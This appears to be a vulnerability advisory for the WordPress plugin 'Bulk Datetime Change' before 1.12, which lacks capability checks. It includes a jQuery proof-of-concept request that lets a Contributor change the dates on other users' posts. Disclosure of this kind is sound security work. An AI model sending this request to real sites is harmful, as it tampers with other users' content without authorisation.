WordPress Plugin Vulnerabilities

Bulk Datetime Change < 1.12 - Missing Authorisation

Description

The plugin does not enforce capability checks which allows users with Contributor roles to 1) list private post titles of other users and 2) change the posted date of other users' posts.

Proof of Concept

Run on "Bulk Datetime Change" page:

jQuery.post("https://example.com/wp-admin/admin.php?page=bulkdatetimechange",{
  bulk_datetime_change_update: jQuery("#bulk_datetime_change_update").attr("value"),
  "bulk_date_check[]": "509",
  "bulk_date_update[509]": "2021-09-23+12:11:40",
  "bulk-datetime-change-update1": "1"
})

Affects Plugins

References

Classification

Type
ACCESS CONTROLS
CWE

Miscellaneous

Original Researcher
apple502j
Submitter
apple502j
Verified
Yes

Timeline

Publicly Published
2021-10-26 (about 2 years ago)
Added
2021-10-26 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other